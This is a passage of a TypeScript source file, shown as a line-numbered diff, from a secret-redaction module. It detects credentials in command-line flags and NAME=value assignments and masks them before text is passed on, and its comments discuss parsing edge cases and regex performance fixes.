|
-
return false;
|
|
1699
|
-
}
|
|
1700
|
-
|
|
1701
|
-
/** The text behind `at` a gated flag may look in: one command, bounded. */
|
|
1702
|
-
function commandWindow(lower: string, at: number): string {
|
|
1703
|
-
let from = Math.max(0, at - COMMAND_LOOKBACK);
|
|
1704
|
-
for (let i = at - 1; i >= from; i--) {
|
|
1705
|
-
const c = lower[i];
|
|
1706
|
-
if (c === "\n" || c === "\r" || c === ";" || c === "&" || c === "|") {
|
|
1707
|
-
from = i + 1;
|
|
1708
|
-
break;
|
|
1709
|
-
}
|
|
1710
|
-
}
|
|
1711
|
-
return lower.slice(from, at);
|
|
1712
|
-
}
|
|
1713
|
-
|
|
1714
|
-
/**
|
|
1715
|
-
* Every word that can gate a flag. A word that is nowhere in the text gates
|
|
1716
|
-
* nothing, and checking that ONCE per string is what keeps a line of repeated
|
|
1717
|
-
* `-p ` from costing a window and a dozen searches per flag: 448 ms for a
|
|
1718
|
-
* full-sized envelope of them, against the 600 ms this file's own budget test
|
|
1719
|
-
* asserts.
|
|
1720
|
-
*/
|
|
1721
|
-
const GATING_WORDS: ReadonlyArray<string> = [
|
|
1722
|
-
...new Set([
|
|
1723
|
-
...GATED_CREDENTIAL_FLAGS.flatMap((g) => [...g.commands, ...(g.also === undefined ? [] : [g.also])]),
|
|
1724
|
-
...BASIC_AUTH_COMMANDS,
|
|
1725
|
-
]),
|
|
1726
|
-
];
|
|
1727
|
-
|
|
1728
|
-
/**
|
|
1729
|
-
* Where the one command-line argument that starts at `start` ends.
|
|
1730
|
-
*
|
|
1731
|
-
* `close` is the quote the COMMAND itself sits inside, carried forward by the
|
|
1732
|
-
* same cursor the header path uses. It is what ends the argument in the
|
|
1733
|
-
* commonest MCP shape of all — `{"command": "app --password pw"}` — where the
|
|
1734
|
-
* `"` belongs to the JSON around the command, not to the value: swallowing it
|
|
1735
|
-
* put `pw"}` on the scrub list, so the bare copy of that credential elsewhere
|
|
1736
|
-
* in the envelope no longer matched and went out to Jev, and it cost the text
|
|
1737
|
-
* Jev was shown its closing quote.
|
|
1738
|
-
*/
|
|
1739
|
-
function credentialArgumentEnd(text: string, start: number, close: string | null): { from: number; to: number } {
|
|
1740
|
-
// A quote of the value's own: `--password 'pw'`, and inside an enclosing
|
|
1741
|
-
// string `--password \"pw\"` or `-p 'pw'` just the same.
|
|
1742
|
-
const own = valueOwnQuote(text, start, close);
|
|
1743
|
-
if (own !== null) {
|
|
1744
|
-
for (let i = start + own.length; i < text.length; i++) {
|
|
1745
|
-
if (text.startsWith(own, i)) return { from: start + own.length, to: i };
|
|
1746
|
-
const c = text[i];
|
|
1747
|
-
if (c === "\n" || c === "\r") break;
|
|
1748
|
-
if (c === "\\" && (text[i + 1] === "n" || text[i + 1] === "r")) break;
|
|
1749
|
-
}
|
|
1750
|
-
}
|
|
1751
|
-
let i = start;
|
|
1752
|
-
while (i < text.length) {
|
|
1753
|
-
const c = text[i];
|
|
1754
|
-
if (close !== null && text.startsWith(close, i)) break;
|
|
1755
|
-
// A marker an earlier rule wrote has spaces in it and is one unit.
|
|
1756
|
-
if (c === "<" && text.startsWith(AUTH_MARKER_HEAD, i)) {
|
|
1757
|
-
const closed = text.indexOf(">", i);
|
|
1758
|
-
if (closed > 0) {
|
|
1759
|
-
i = closed + 1;
|
|
1760
|
-
continue;
|
|
1761
|
-
}
|
|
1762
|
-
}
|
|
1763
|
-
if (c === " " || c === "\t" || c === "\n" || c === "\r" || c === ";" || c === "&" || c === "|") break;
|
|
1764
|
-
if (c === "\\" && /[nr]/.test(text[i + 1] ?? "")) break;
|
|
1765
|
-
i++;
|
|
1766
|
-
}
|
|
1767
|
-
return { from: start, to: i };
|
|
1768
|
-
}
|
|
1769
|
-
|
|
1770
|
-
/**
|
|
1771
|
-
* Whether a flag's value is GLUED to it rather than separated: `-ppw`, `-p'pw'`
|
|
1772
|
-
* and `-p$PW` are all one argument. The flag token stops at the first character
|
|
1773
|
-
* that cannot be part of a flag NAME, so a glued value that opens with a quote,
|
|
1774
|
-
* a `$` or any other punctuation is not in the token and has to be seen here.
|
|
1775
|
-
*/
|
|
1776
|
-
function hasGluedValue(text: string, at: number): boolean {
|
|
1777
|
-
const c = text[at];
|
|
1778
|
-
if (c === undefined) return false;
|
|
1779
|
-
return c !== " " && c !== "\t" && c !== "=" && c !== "\n" && c !== "\r" && c !== ";" && c !== "&" && c !== "|";
|
|
1780
|
-
}
|
|
1781
|
-
|
|
1782
|
-
/**
|
|
1783
|
-
* Where the value of a flag ending at `flagEnd` starts, or -1 if it has none.
|
|
1784
|
-
*
|
|
1785
|
-
* `close` is the quote the COMMAND sits inside. A quote spelled exactly like
|
|
1786
|
-
* it, written straight behind the flag, is that string's END rather than a
|
|
1787
|
-
* value glued to the flag: `["--base-url", BASE, "--api-key", ""]` is a flag
|
|
1788
|
-
* written as a list entry, and reading its closing quote as the start of a
|
|
1789
|
-
* value made the `, ` between two entries the credential and replaced it with
|
|
1790
|
-
* a marker in ordinary Python test code. A real glued value inside a JSON
|
|
1791
|
-
* string opens with an ESCAPED quote (`-p\"pw\"`), which is a different
|
|
1792
|
-
* spelling and still taken.
|
|
1793
|
-
*/
|
|
1794
|
-
function credentialValueStart(text: string, flagEnd: number, attached: boolean, close: string | null): number {
|
|
1795
|
-
if (close !== null && text.startsWith(close, flagEnd)) return -1;
|
|
1796
|
-
if (attached) return flagEnd;
|
|
1797
|
-
let i = flagEnd;
|
|
1798
|
-
if (text[i] === "=") i++;
|
|
1799
|
-
else if (hasGluedValue(text, i)) return i;
|
|
1800
|
-
else while (text[i] === " " || text[i] === "\t") i++;
|
|
1801
|
-
if (i === flagEnd) return -1; // nothing but a terminator behind the flag
|
|
1802
|
-
const v = text[i];
|
|
1803
|
-
if (v === undefined || v === "\n" || v === "\r" || v === ";" || v === "&" || v === "|") return -1;
|
|
1804
|
-
return i;
|
|
1805
|
-
}
|
|
1806
|
-
|
|
1807
|
-
/**
|
|
1808
|
-
* Every credential argument in `text`, as one marker each. The quotes around a
|
|
1809
|
-
* value stay where they were written, around the marker, so the secret handed
|
|
1810
|
-
* to the scrub pass is the BARE value — the form its copies elsewhere in the
|
|
1811
|
-
* envelope are in.
|
|
1812
|
-
*/
|
|
1813
|
-
function redactCredentialArguments(text: string, counter: Counter): string {
|
|
1814
|
-
let out = "";
|
|
1815
|
-
let last = 0;
|
|
1816
|
-
// The quote the command itself sits inside, carried forward in one pass.
|
|
1817
|
-
const cur: QuoteCursor = { pos: 0, open: null };
|
|
1818
|
-
// Lowercased once per string, and only when a gated flag is actually met.
|
|
1819
|
-
let lower: string | null = null;
|
|
1820
|
-
let present: ReadonlySet<string> | null = null;
|
|
1821
|
-
const gates = (w: string): boolean => {
|
|
1822
|
-
if (present === null) {
|
|
1823
|
-
lower = text.toLowerCase();
|
|
1824
|
-
present = new Set(GATING_WORDS.filter((x) => (lower as string).includes(x)));
|
|
1825
|
-
}
|
|
1826
|
-
return present.has(w);
|
|
1827
|
-
};
|
|
1828
|
-
FLAG_TOKEN_RE.lastIndex = 0;
|
|
1829
|
-
for (let m = FLAG_TOKEN_RE.exec(text); m !== null; m = FLAG_TOKEN_RE.exec(text)) {
|
|
1830
|
-
const flagAt = m.index + m[1].length;
|
|
1831
|
-
if (flagAt < last) continue;
|
|
1832
|
-
const raw = m[2];
|
|
1833
|
-
const token = raw.toLowerCase();
|
|
1834
|
-
let win: string | null = null;
|
|
1835
|
-
const near = (w: string): boolean => gates(w) && hasCommandWord((win ??= commandWindow(lower as string, flagAt)), w);
|
|
1836
|
-
let flagEnd = -1;
|
|
1837
|
-
let attached = false;
|
|
1838
|
-
let label = "credential argument";
|
|
1839
|
-
let basicAuth = false;
|
|
1840
|
-
if (CREDENTIAL_FLAGS.has(token)) {
|
|
1841
|
-
flagEnd = flagAt + raw.length;
|
|
1842
|
-
label = "assigned secret";
|
|
1843
|
-
} else if (BASIC_AUTH_FLAGS.has(token) && BASIC_AUTH_COMMANDS.some(near)) {
|
|
1844
|
-
flagEnd = flagAt + raw.length;
|
|
1845
|
-
label = "basic auth";
|
|
1846
|
-
basicAuth = true;
|
|
1847
|
-
} else {
|
|
1848
|
-
for (const g of GATED_CREDENTIAL_FLAGS) {
|
|
1849
|
-
const cand = g.flag.startsWith("--") ? token : raw;
|
|
1850
|
-
if (!cand.startsWith(g.flag)) continue;
|
|
1851
|
-
// `-p'pw'` and `-p$PW` are the glued form too: the flag token stops in
|
|
1852
|
-
// front of a character a flag NAME cannot hold.
|
|
1853
|
-
const glued = cand.length > g.flag.length || hasGluedValue(text, flagAt + g.flag.length);
|
|
1854
|
-
if (g.attachedOnly === true && !glued) continue;
|
|
1855
|
-
if (!g.commands.some(near)) continue;
|
|
1856
|
-
if (g.also !== undefined && !near(g.also)) continue;
|
|
1857
|
-
flagEnd = flagAt + g.flag.length;
|
|
1858
|
-
attached = glued;
|
|
1859
|
-
break;
|
|
1860
|
-
}
|
|
1861
|
-
}
|
|
1862
|
-
if (flagEnd < 0) continue;
|
|
1863
|
-
// The quote state AT THE FLAG, before its value: the cursor only ever
|
|
1864
|
-
// moves forward, so asking here costs nothing and the answer is what
|
|
1865
|
-
// decides whether the character behind the flag is a value or the end of
|
|
1866
|
-
// the string the flag itself is written in.
|
|
1867
|
-
if (cur.pos < flagEnd) advanceQuotes(text, cur, flagEnd);
|
|
1868
|
-
let start = credentialValueStart(text, flagEnd, attached, cur.open);
|
|
1869
|
-
if (start < 0) continue;
|
|
1870
|
-
if (cur.pos < start) advanceQuotes(text, cur, start);
|
|
1871
|
-
const close = cur.open;
|
|
1872
|
-
let arg = credentialArgumentEnd(text, start, close);
|
|
1873
|
-
if (basicAuth) {
|
|
1874
|
-
// `-u user:pass`: only what follows the FIRST colon is the credential.
|
|
1875
|
-
const colon = text.indexOf(":", arg.from);
|
|
1876
|
-
if (colon < 0 || colon >= arg.to) continue;
|
|
1877
|
-
start = colon + 1;
|
|
1878
|
-
arg = valueOwnQuote(text, start, close) !== null ? credentialArgumentEnd(text, start, close) : { from: start, to: arg.to };
|
|
1879
|
-
}
|
|
1880
|
-
if (arg.to <= arg.from) continue;
|
|
1881
|
-
const value = text.slice(arg.from, arg.to);
|
|
1882
|
-
// Already replaced by an earlier rule: a second pass must be a no-op.
|
|
1883
|
-
// A lone quote or backslash is nobody's credential either — that is what a
|
|
1884
|
-
// desynchronised cursor leaves behind, and a marker over it would both
|
|
1885
|
-
// read as handled and hide the delimiter Jev needs to parse the call.
|
|
1886
|
-
if (withoutMarkers(value).replace(/[\\"']/g, "").trim() === "") continue;
|
|
1887
|
-
out += text.slice(last, arg.from) + marker(label);
|
|
1888
|
-
counter.n++;
|
|
1889
|
-
// Only the bare credential goes on the scrub list, and only when it could
|
|
1890
|
-
// be one: this rule redacts on the FLAG alone, so `git commit -am "fix
|
|
1891
|
-
// --token parsing"` lands here too.
|
|
1892
|
-
const copy = credentialCopy(value);
|
|
1893
|
-
if (copy !== null) (copy.weak ? counter.weak : counter.found).push(copy.value);
|
|
1894
|
-
last = arg.to;
|
|
1895
|
-
FLAG_TOKEN_RE.lastIndex = arg.to;
|
|
1896
|
-
}
|
|
1897
|
-
FLAG_TOKEN_RE.lastIndex = 0;
|
|
1898
|
-
return last === 0 ? text : out + text.slice(last);
|
|
1899
|
-
}
|
|
1900
|
-
|
|
1901
|
-
/**
|
|
1902
|
-
* `config set <name> <value>`: aws configure, npm/pnpm/yarn config, git config.
|
|
1903
|
-
* Redacted only when the NAME says it is a secret and the value looks like one
|
|
1904
|
-
* — prose such as "run `x config --token <token>` and …" has the same shape.
|
|
1905
|
-
*/
|
|
1906
|
-
const CONFIG_SET_RE =
|
|
1907
|
-
/(\b(?:config(?:ure)?[ \t]+set|config)(?:[ \t]+--?[A-Za-z][\w-]*)*[ \t]+)([A-Za-z_/@.:][^\s"'=<>]*)([ \t]+)("[^"\n]*"|'[^'\n]*'|[^\s"';&|]+)/g;
|
|
1908
|
-
|
|
1909
|
-
/**
|
|
1910
|
-
* `NAME=value`, `NAME: value`, `"name": "value"`, `--name=value`, `?name=value`,
|
|
1911
|
-
* `name = "value"` — every syntax an assignment is written in, in one scan.
|
|
1912
|
-
* The NAME decides whether the value is a secret (see `secretNameStrength`) and
|
|
1913
|
-
* the value has to look like a literal (see `assignmentValueIsSecret`).
|
|
1914
|
-
*
|
|
1915
|
-
* 1 the token boundary in front of the name
|
|
1916
|
-
* 2 optional quote before the name (JSON; possibly JSON-escaped)
|
|
1917
|
-
* 3 the name, keeping a flag's leading dashes
|
|
1918
|
-
* 4 optional quote after the name
|
|
1919
|
-
* 5 the separator
|
|
1920
|
-
*
|
|
1921
|
-
* The regex stops at the SEPARATOR; the value is walked in code by
|
|
1922
|
-
* `literalValue`. That is the same structural fix the credential-header rule
|
|
1923
|
-
* took, and for the same reason. Matching the value here was the file's last
|
|
1924
|
-
* quadratic: an unquoted value may hold `=`, so on a delimiter-free run like
|
|
1925
|
-
* `a=key=a=key=…` the engine consumed the rest of the run at every start
|
|
1926
|
-
* position and `replaceCounting` then resumed one character later. 910 ms for
|
|
1927
|
-
* one envelope of that shape, growing as the square — 20 ms at 16 KB, 87 at
|
|
1928
|
-
* 32 KB, 467 at 64 KB — with the hook waiting on it before Jev is even called.
|
|
1929
|
-
* A name-only match is O(1) per separator, and the walk visits each character
|
|
1930
|
-
* of the value once.
|
|
1931
|
-
*
|
|
1932
|
-
* Group 1 is what keeps the NAME linear, and it is why the name is not checked
|
|
1933
|
-
* for a token boundary in code afterwards. Without it the name could start at
|
|
1934
|
-
* any character of a token: on a 4 000-character run of identifier characters
|
|
1935
|
-
* with no separator in it, the engine consumed the rest of the run at every one
|
|
1936
|
-
* of those positions and backtracked over it — 35 ms for one string, and
|
|
1937
|
-
* `buildEnvelope` redacts up to 576 of them. Requiring a boundary character
|
|
1938
|
-
* makes every position inside a token fail in one step. The boundary is
|
|
1939
|
-
* consumed rather than a lookbehind because a lookbehind drops the regex JIT,
|
|
1940
|
-
* which costs more than it saves on every other string; it is re-emitted in
|
|
1941
|
-
* front of the replacement. `\n`, `\r` and `\t` count because input nested two
|
|
1942
|
-
* levels deep is JSON-stringified, where a name at the start of a line follows
|
|
1943
|
-
* the two characters `\` `n` — that alternative comes first so the name is
|
|
1944
|
-
* `API_KEY` rather than `nAPI_KEY`.
|
|
1945
|
-
*/
|
|
1946
|
-
const ASSIGNMENT_NAME_RE =
|
|
1947
|
-
/(^|\\[nrt]|[^A-Za-z0-9_.-])((?:\\?["'])?)(-{0,2}[A-Za-z_][A-Za-z0-9_.-]*)((?:\\?["'])?)([ \t]*(?::=|=|:(?!\/\/))[ \t]*)/g;
|
|
1948
|
-
|
|
1949
|
-
/**
|
|
1950
|
-
* `--password hunter2`: a secret-named flag and a separate value.
|
|
1951
|
-
*
|
|
1952
|
-
* 1 the token boundary 2 the flag 3 the space
|
|
1953
|
-
*
|
|
1954
|
-
* Boundary group and code-walked value as in `ASSIGNMENT_NAME_RE`, and for the
|
|
1955
|
-
* same two reasons: `-` is a name character, so without the boundary every
|
|
1956
|
-
* hyphen of a kebab-case run started a flag whose tail was consumed and
|
|
1957
|
-
* backtracked (`x--token` and `a-b c` were then declined in code, after the
|
|
1958
|
-
* cost had been paid).
|
|
1959
|
-
*/
|
|
1960
|
-
const FLAG_NAME_RE = /(^|\\[nrt]|[^A-Za-z0-9_.-])(--?[A-Za-z][A-Za-z0-9_-]*)([ \t]+)/g;
|
|
1961
|
-
|
|
1962
|
-
/** Where an unquoted literal value ends. */
|
|
1963
|
-
const UNQUOTED_VALUE_STOP_RE = /[\s"'`<>(){}[\],;&|\\]/;
|
|
1964
|
-
|
|
1965
|
-
/**
|
|
1966
|
-
* The literal value written at `at`: a quoted one, or a run of value
|
|
1967
|
-
* characters. Null when there is none.
|
|
1968
|
-
*
|
|
1969
|
-
* A character walk, never a regex, so no input can make it backtrack. The
|
|
1970
|
-
* quoted form ends at the first matching delimiter on the line, and the
|
|
1971
|
-
* delimiter itself is NOT part of the span — it stays in the text to be the
|
|
1972
|
-
* boundary of whatever comes next, because `TOKEN="a"PASSWORD=x` has no
|
|
1973
|
-
* character to spare between the two and consuming that quote hid the second
|
|
1974
|
-
* assignment from the scan entirely.
|
|
1975
|
-
*
|
|
1976
|
-
* `escapedQuote` accepts a JSON-escaped `\"` as the delimiter (an assignment
|
|
1977
|
-
* nested two levels deep); `leadingDash` allows a value that opens with `-`
|
|
1978
|
-
* (`--password -aB3…`), which a flag's value may not, or `--token --verbose`
|
|
1979
|
-
* would read the next flag as the credential.
|
|
1980
|
-
*
|
|
1981
|
-
* `stop` is what keeps the UNQUOTED walk linear over the whole text. An
|
|
1982
|
-
* unquoted value may hold `=`, so on a delimiter-free run (`a=key=a=key=…`)
|
|
1983
|
-
* every value runs to the end of the run and the walk is quadratic — the same
|
|
1984
|
-
* cost the old regex paid, moved into code. The cursor remembers a span
|
|
1985
|
-
* `[from, at)` it has already proved holds no stop character; a question
|
|
1986
|
-
* inside that span is answered without rescanning it, and one outside it
|
|
1987
|
-
* starts a fresh span. Questions arrive in increasing order almost always, so
|
|
1988
|
-
* the whole scan visits each character about once.
|
|
1989
|
-
*/
|
|
1990
|
-
function literalValue(
|
|
1991
|
-
text: string,
|
|
1992
|
-
at: number,
|
|
1993
|
-
opts: { escapedQuote: boolean; leadingDash: boolean; stop: { from: number; at: number } },
|
|
1994
|
-
): { quote: string; from: number; to: number } | null {
|
|
1995
|
-
const c = text[at];
|
|
1996
|
-
if (c === undefined) return null;
|
|
1997
|
-
let quote = "";
|
|
1998
|
-
if (c === '"' || c === "'") quote = c;
|
|
1999
|
-
else if (opts.escapedQuote && c === "\\" && (text[at + 1] === '"' || text[at + 1] === "'")) quote = text.slice(at, at + 2);
|
|
2000
|
-
if (quote !== "") {
|
|
2001
|
-
for (let i = at + quote.length; i < text.length; i++) {
|
|
2002
|
-
if (text.startsWith(quote, i)) return { quote, from: at + quote.length, to: i };
|
|
2003
|
-
const d = text[i];
|
|
2004
|
-
if (d === "\n" || d === "\r") return null;
|
|
2005
|
-
}
|
|
2006
|
-
return null;
|
|
2007
|
-
}
|
|
2008
|
-
if (!opts.leadingDash && c === "-") return null;
|
|
2009
|
-
if (at < opts.stop.from || at > opts.stop.at) {
|
|
2010
|
-
let i = at;
|
|
2011
|
-
while (i < text.length && !UNQUOTED_VALUE_STOP_RE.test(text[i])) i++;
|
|
2012
|
-
opts.stop.from = at;
|
|
2013
|
-
opts.stop.at = i;
|
|
2014
|
-
}
|
|
2015
|
-
return opts.stop.at > at ? { quote: "", from: at, to: opts.stop.at } : null;
|
|
2016
|
-
}
|
|
2017
|
-
|
|
2018
|
-
/** Long runs of token characters: candidates for the high-entropy rule. Greedy, so a match is a whole run. */
|
|
2019
|
-
const LONG_TOKEN_RE = /[A-Za-z0-9_-]{32,}/g;
|
|
2020
|
-
|
|
2021
|
-
// ── Secret names ─────────────────────────────────────────────────────────────
|
|
2022
|
-
|
|
2023
|
-
/** A secret on their own, as the last word of a name or the whole of it. */
|
|
2024
|
-
const STRONG_LAST_WORDS = new Set([
|
|
2025
|
-
"secret",
|
|
2026
|
-
"password",
|
|
2027
|
-
"passwd",
|
|
2028
|
-
"passphrase",
|
|
2029
|
-
"pwd",
|
|
2030
|
-
"credential",
|
|
2031
|
-
"credentials",
|
|
2032
|
-
"apikey",
|
|
2033
|
-
"cookie",
|
|
2034
|
-
]);
|
|
2035
|
-
/** `<one of these>_key` is a secret key rather than a lookup key. */
|
|
2036
|
-
const STRONG_KEY_QUALIFIERS = new Set(["api", "secret", "private", "master", "signing", "encryption", "client", "auth", "access"]);
|
|
2037
|
-
/**
|
|
2038
|
-
* Only a secret as the last word of a COMPOUND name. `key` and `auth` are
|
|
2039
|
-
* ordinary words in code — React's `key` prop is on every JSX list — so a bare
|
|
2040
|
-
* `key=` is not enough; `STRIPE_KEY=` is. (A bare all-caps `KEY=` is: that is an
|
|
2041
|
-
* environment variable, not a prop.)
|
|
2042
|
-
*/
|
|
2043
|
-
const WEAK_LAST_WORDS = new Set(["key", "pat", "pass", "auth", "sig", "signature", "dsn"]);
|
|
2044
|
-
/** The word before `key`/`token` that makes it a lookup key or a counter, not a credential. */
|
|
2045
|
-
const NOT_SECRET_QUALIFIERS = new Set([
|
|
2046
|
-
"primary", "foreign", "sort", "partition", "range", "hash", "row", "unique", "composite", "object",
|
|
2047
|
-
"cache", "storage", "local", "idempotency", "dedup", "dedupe", "lookup", "map", "dict", "index",
|
|
2048
|
-
"list", "group", "field", "item", "node", "event", "message", "column", "table", "form", "route",
|
|
2049
|
-
"query", "i18n", "translation", "locale", "react", "redis", "s3", "bucket", "file", "path", "state",
|
|
2050
|
-
"store", "registry", "setting", "settings", "config", "design", "theme", "color", "next", "page",
|
|
2051
|
-
"continuation", "cursor", "max", "min", "num", "total", "count", "input", "output", "completion",
|
|
2052
|
-
"prompt", "cancel", "cancellation", "sync", "lock", "rate", "limit", "sort", "order", "public",
|
|
2053
|
-
"publishable", "pub", "ssh", "gpg", "pgp",
|
|
2054
|
-
// Predicates and verbs: `has_key`, `is_token`, `rotate_secret_key`, `mask_token`.
|
|
2055
|
-
"has", "is", "use", "with", "no", "needs", "require", "requires", "enable", "enabled", "allow",
|
|
2056
|
-
"missing", "valid", "invalid", "check", "get", "load", "read", "parse", "validate", "generate",
|
|
2057
|
-
"create", "rotate", "fetch", "find", "show", "print", "mask", "masked", "redact", "redacted", "hide",
|
|
2058
|
-
"hidden",
|
|
2059
|
-
// Values that say they are not real.
|
|
2060
|
-
"example", "sample", "dummy", "fake", "mock", "placeholder",
|
|
2061
|
-
]);
|
|
2062
|
-
/** A name ending in one of these describes the secret; its value is not the secret. */
|
|
2063
|
-
const META_SUFFIXES = new Set([
|
|
2064
|
-
"dir", "dirs", "path", "paths", "file", "files", "filename", "name", "names", "id", "ids", "arn",
|
|
2065
|
-
"ref", "refs", "length", "len", "count", "days", "ttl", "version", "url", "uri", "env", "manager",
|
|
2066
|
-
"store", "provider", "type", "types", "format", "policy", "policies", "rotation", "enabled",
|
|
2067
|
-
"required", "min", "max", "header", "field", "param", "params", "prompt", "label", "placeholder",
|
|
2068
|
-
"hint", "error", "errors", "message", "regex", "re", "pattern", "patterns", "validator", "strength",
|
|
2069
|
-
"scanning", "scanner", "detection", "mode", "list", "set", "map", "size", "bytes", "expiry",
|
|
2070
|
-
"expires", "expiration", "timeout", "exposure", "hash",
|
|
2071
|
-
]);
|
|
2072
|
-
|
|
2073
|
-
function nameComponents(name: string): string[] {
|
|
2074
|
-
return name
|
|
2075
|
-
.replace(/([a-z0-9])([A-Z])/g, "$1_$2")
|
|
2076
|
-
.toLowerCase()
|
|
2077
|
-
.split(/[^a-z0-9]+/)
|
|
2078
|
-
.filter(Boolean);
|
|
2079
|
-
}
|
|
2080
|
-
|
|
2081
|
-
/**
|
|
2082
|
-
* Whether an identifier's name says its value is a credential.
|
|
2083
|
-
*
|
|
2084
|
-
* `strong`: the value is a secret whatever it looks like (`DATABASE_PASSWORD`,
|
|
2085
|
-
* `client_secret`, `GITHUB_TOKEN`, `apiKey`). `weak`: only a value that ALSO
|
|
2086
|
-
* looks like a token counts (`STRIPE_KEY`, `sentry_dsn`). `null`: not a secret
|
|
2087
|
-
* name (`sort_key`, `max_tokens`, `SECRETS_DIR`, `PASSWORD_MIN_LENGTH`,
|
|
2088
|
-
* `NEXT_PUBLIC_API_KEY`).
|
|
2089
|
-
*/
|
|
2090
|
-
export function secretNameStrength(name: string): "strong" | "weak" | null {
|
|
2091
|
-
const bare = name.replace(/^[-"'\\]+|["'\\]+$/g, "");
|
|
2092
|
-
const comps = nameComponents(bare);
|
|
2093
|
-
if (comps.length === 0) return null;
|
|
2094
|
-
if (comps.some((c) => c === "public" || c === "publishable")) return null;
|
|
2095
|
-
const last = comps[comps.length - 1];
|
|
2096
|
-
const prev = comps.length > 1 ? comps[comps.length - 2] : undefined;
|
|
2097
|
-
if (STRONG_LAST_WORDS.has(last)) return "strong";
|
|
2098
|
-
if (last === "key" && prev && STRONG_KEY_QUALIFIERS.has(prev)) return "strong";
|
|
2099
|
-
if (prev && NOT_SECRET_QUALIFIERS.has(prev)) return null;
|
|
2100
|
-
if (last === "token") return "strong";
|
|
2101
|
-
// Run-together names the component split cannot see into: PGPASSWORD,
|
|
2102
|
-
// NPMTOKEN, GHTOKEN, MYAPIKEY.
|
|
2103
|
-
if (/(?:password|passwd|passphrase|secret|token|apikey)$/.test(last) && !NOT_SECRET_QUALIFIERS.has(last)) return "strong";
|
|
2104
|
-
if (comps.length === 1 && /^[A-Z0-9]{2,}KEY$/.test(bare)) return "strong"; // ORGKEY, DEPLOYKEY
|
|
2105
|
-
if (WEAK_LAST_WORDS.has(last) && (comps.length > 1 || /^[A-Z]+$/.test(bare))) {
|
|
2106
|
-
// An ENVIRONMENT-style name (`ADMIN_KEY`, `DEPLOY_KEY`) holds a credential
|
|
2107
|
-
// whatever its value looks like — `ADMIN_KEY="dev-admin-key"` is a live
|
|
2108
|
-
// login on a dev stack. The same word in code (`adminKey`) is too often a
|
|
2109
|
-
// lookup key to trust without a token-shaped value.
|
|
2110
|
-
return /^[A-Z][A-Z0-9_]*$/.test(bare) ? "strong" : "weak";
|
|
2111
|
-
}
|
|
2112
|
-
// A secret word earlier in the name, with a last word that still names the
|
|
2113
|
-
// value rather than describing it: Rails' SECRET_KEY_BASE.
|
|
2114
|
-
const earlier = comps.slice(0, -1);
|
|
2115
|
-
if (earlier.some((c) => c === "secret" || c === "password" || c === "passwd") && !META_SUFFIXES.has(last)) return "strong";
|
|
2116
|
-
return null;
|
|
2117
|
-
}
|
|
2118
|
-
|
|
2119
|
-
/**
|
|
2120
|
-
* A linear pre-filter for the three name-driven scans: whether any name in
|
|
2121
|
-
* `text` could be a secret name at all.
|
|
2122
|
-
*
|
|
2123
|
-
* `secretNameStrength` says yes only to a name that holds one of its own words,
|
|
2124
|
-
* so a string holding none of them has nothing for those scans to find. The
|
|
2125
|
-
* list is derived from the sets above — a word added there is covered without
|
|
2126
|
-
* a second edit — and reduced to a minimal cover, because a name holding
|
|
2127
|
-
* `password` holds `pass` too.
|
|
2128
|
-
*
|
|
2129
|
-
* It is also three passes saved on every string that holds no such word, which
|
|
2130
|
-
* is most of them. It is NOT what makes those scans linear — a run that does
|
|
2131
|
-
* hold one of these words (`a=key=a=key=…`) skips nothing, and 910 ms of one
|
|
2132
|
-
* envelope was exactly that shape. `ASSIGNMENT_NAME_RE` and `literalValue`
|
|
2133
|
-
* are what fixed the cost.
|
|
2134
|
-
*/
|
|
2135
|
-
const SECRET_NAME_HINTS: ReadonlyArray<string> = (() => {
|
|
2136
|
-
const words = [...new Set([...STRONG_LAST_WORDS, ...WEAK_LAST_WORDS, "token", "code"])];
|
|
2137
|
-
return words.filter((w) => !words.some((other) => other !== w && w.includes(other)));
|
|
2138
|
-
})();
|
|
2139
|
-
|
|
2140
|
-
function mayHoldSecretName(text: string): boolean {
|
|
2141
|
-
const lower = text.toLowerCase();
|
|
2142
|
-
for (const word of SECRET_NAME_HINTS) if (lower.includes(word)) return true;
|
|
2143
|
-
return false;
|
|
2144
|
-
}
|
|
2145
|
-
|
|
2146
|
-
// ── Value shapes ─────────────────────────────────────────────────────────────
|
|
2147
|
-
|
|
2148
|
-
const NON_VALUE_WORDS = new Set(["true", "false", "null", "none", "nil", "undefined", "yes", "no", "on", "off"]);
|
|
2149
|
-
const TYPED_ARRAY_RE = /^(?:Big)?(?:Uint|Int)\d+Array$|^Float\d+Array$|^Uint8ClampedArray$/;
|
|
2150
|
-
/** Type names and schema words that follow `NAME: ` in code and config, not a value. */
|
|
2151
|
-
const TYPE_WORDS = new Set([
|
|
2152
|
-
"str", "string", "int", "integer", "number", "float", "double", "bool", "boolean", "bytes", "any",
|
|
2153
|
-
"unknown", "object", "optional", "secretstr", "secretbytes", "union", "list", "dict", "map", "array",
|
|
2154
|
-
"text", "char", "varchar", "required",
|
|
2155
|
-
]);
|
|
2156
|
-
|
|
2157
|
-
/** `$VAR`, `${VAR}`, `` `cmd` ``, `{expr}`, `(expr)`, `<placeholder>`, `[list]`, `%VAR%`. */
|
|
2158
|
-
const REFERENCE_START_RE = /^[$`{(<[%]/;
|
|
2159
|
-
|
|
2160
|
-
/** True for a string that could be a literal value rather than a reference, a path or a keyword. */
|
|
2161
|
-
function isLiteral(value: string): boolean {
|
|
2162
|
-
if (!value) return false;
|
|
2163
|
-
if (REFERENCE_START_RE.test(value)) return false;
|
|
2164
|
-
if (/^(?:\/|\.\.?\/|~\/|~$|[A-Za-z]:\\)/.test(value)) return false; // a path names where a secret is, not the secret
|
|
2165
|
-
if (NON_VALUE_WORDS.has(value.toLowerCase())) return false;
|
|
2166
|
-
if (/^[*x•.#-]+$/i.test(value)) return false; // already masked
|
|
2167
|
-
return true;
|
|
2168
|
-
}
|
|
2169
|
-
|
|
2170
|
-
/** Fraction of adjacent characters that change class (lower/upper/digit/other). */
|
|
2171
|
-
function classSwitchRate(s: string): number {
|
|
2172
|
-
const cls = (c: string): number => (c >= "a" && c <= "z" ? 0 : c >= "A" && c <= "Z" ? 1 : c >= "0" && c <= "9" ? 2 : 3);
|
|
2173
|
-
let switches = 0;
|
|
2174
|
-
for (let i = 1; i < s.length; i++) if (cls(s[i]) !== cls(s[i - 1])) switches++;
|
|
2175
|
-
return s.length > 1 ? switches / (s.length - 1) : 0;
|
|
2176
|
-
}
|
|
2177
|
-
|
|
2178
|
-
/**
|
|
2179
|
-
* Looks like a generated token rather than a word, a name or a phrase: it has a
|
|
2180
|
-
* digit, a lower→upper case hump (`aBcD`, not the capital of `Bearer`), or a
|
|
2181
|
-
